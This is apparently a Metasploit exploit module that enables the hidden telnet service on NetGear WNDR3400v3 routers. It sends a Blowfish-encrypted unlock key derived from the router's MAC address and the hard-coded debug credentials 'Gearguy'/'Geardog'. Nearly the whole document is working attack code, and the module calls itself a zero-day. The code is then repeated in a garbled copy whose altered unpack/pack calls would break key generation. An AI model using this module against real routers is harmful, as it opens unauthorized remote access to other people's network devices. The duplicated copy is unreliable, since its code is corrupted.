carnal0wnage/netgear_telnet_enabler.rb

## netgear_telnet_enabler.rb
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
                         # add gem 'crypt', '1.1.4' to Gemfile

module ::Crypt
class Blowfish
  def setup_blowfish()
    @sBoxes = Array.new(4) { |i| INITIALSBOXES[i].clone }
    @pArray = INITIALPARRAY.clone
    keypos = 0
    0.upto(17) { |i|
      data = 0
      4.times {
        data = ((data << 8) | @key[keypos].ord) % ULONG  # minor bug fix to the 1.1.4 version (add .ord for 1.9 compat)
        keypos = (keypos.next) % @key.length
      }
      @pArray[i] = (@pArray[i] ^ data) % ULONG
    }
    l = 0
    r = 0
    0.step(17, 2) { |i|
      l, r = encrypt_pair(l, r)
      @pArray[i]   = l
      @pArray[i+1] = r
    }
    0.upto(3) { |i|
      0.step(255, 2) { |j|
        l, r = encrypt_pair(l, r)
        @sBoxes[i][j]   = l
        @sBoxes[i][j+1] = r
      }
    }
  end
end
end


class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'NetGear Telnet Enabler',
      'Description'    => %q{
          This module enables the telnet service on NetGear routers.  Successfully tested on
          a NetGear WNDR34000v3.
      },
      'Author'         => [ 'phikshun' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
        [
          [ 'NA', 'NA' ],
        ],
      'Platform'       => 'linux',
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'Netgear WNDR3400v3', { }, ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '0 day, yo'))

    register_options(
      [
        Opt::RPORT(23),
        OptString.new('MAC', [ true, "The MAC Address of the router LAN interface", nil ]),
        OptString.new('USER', [ true, "The debug username of the router", 'Gearguy' ]),
        OptString.new('PASS', [ true, "The debug password of the router", 'Geardog' ])
      ], self.class)
  end

  def generate_key(mac, username, password = '')
    mac = mac.split(/[\.\-:]/).map { |b| "%02x" % b.to_i(16) }.join('') if mac =~ /[\.\-:]/
    mac.upcase!

    just_mac = mac.ljust(0x10, "\x00")
    just_username = username.ljust(0x10, "\x00")
    just_password = password.ljust(0x10, "\x00")

    cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
    md5_key = OpenSSL::Digest::MD5.digest(cleartext)

    payload = (md5_key + cleartext).ljust(0x80, "\x00").unpack('V*').pack('N*')

    blowfish = Crypt::Blowfish.new("AMBIT_TELNET_ENABLE+" + password)
    ciphertext = payload.scan(/.{8}/).map { |b| blowfish.encrypt_block(b) }.join('')
    ciphertext.unpack('V*').pack('N*')
  end

  def exploit
    connect
    sock.put(generate_key(datastore['MAC'], datastore['USER'], datastore['PASS']))
    disconnect
    print_status("Unlock key sent -- try telneting to #{rhost}")
  end
end
	require 'msf/core'
	require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
	# add gem 'crypt', '1.1.4' to Gemfile

	module ::Crypt
	class Blowfish
	def setup_blowfish()
	@sBoxes = Array.new(4) { \|i\| INITIALSBOXES[i].clone }
	@pArray = INITIALPARRAY.clone
	keypos = 0
	0.upto(17) { \|i\|
	data = 0
	4.times {
	data = ((data << 8) \| @key[keypos].ord) % ULONG # minor bug fix to the 1.1.4 version (add .ord for 1.9 compat)
	keypos = (keypos.next) % @key.length
	}
	@pArray[i] = (@pArray[i] ^ data) % ULONG
	}
	l = 0
	r = 0
	0.step(17, 2) { \|i\|
	l, r = encrypt_pair(l, r)
	@pArray[i] = l
	@pArray[i+1] = r
	}
	0.upto(3) { \|i\|
	0.step(255, 2) { \|j\|
	l, r = encrypt_pair(l, r)
	@sBoxes[i][j] = l
	@sBoxes[i][j+1] = r
	}
	}
	end
	end
	end


	class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
	super(update_info(info,
	'Name' => 'NetGear Telnet Enabler',
	'Description' => %q{
	This module enables the telnet service on NetGear routers. Successfully tested on
	a NetGear WNDR34000v3.
	},
	'Author' => [ 'phikshun' ],
	'License' => MSF_LICENSE,
	'Version' => '$Revision: 14774 $',
	'References' =>
	[
	[ 'NA', 'NA' ],
	],
	'Platform' => 'linux',
	'Privileged' => false,
	'Targets' =>
	[
	[ 'Netgear WNDR3400v3', { }, ],
	],
	'DefaultTarget' => 0,
	'DisclosureDate' => '0 day, yo'))

	register_options(
	[
	Opt::RPORT(23),
	OptString.new('MAC', [ true, "The MAC Address of the router LAN interface", nil ]),
	OptString.new('USER', [ true, "The debug username of the router", 'Gearguy' ]),
	OptString.new('PASS', [ true, "The debug password of the router", 'Geardog' ])
	], self.class)
	end

	def generate_key(mac, username, password = '')
	mac = mac.split(/[\.\-:]/).map { \|b\| "%02x" % b.to_i(16) }.join('') if mac =~ /[\.\-:]/
	mac.upcase!

	just_mac = mac.ljust(0x10, "\x00")
	just_username = username.ljust(0x10, "\x00")
	just_password = password.ljust(0x10, "\x00")

	cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
	md5_key = OpenSSL::Digest::MD5.digest(cleartext)

	payload = (md5_key + cleartext).ljust(0x80, "\x00").unpack('V').pack('N')

	blowfish = Crypt::Blowfish.new("AMBIT_TELNET_ENABLE+" + password)
	ciphertext = payload.scan(/.{8}/).map { \|b\| blowfish.encrypt_block(b) }.join('')
	ciphertext.unpack('V').pack('N')
	end

	def exploit
	connect
	sock.put(generate_key(datastore['MAC'], datastore['USER'], datastore['PASS']))
	disconnect
	print_status("Unlock key sent -- try telneting to #{rhost}")
	end
	end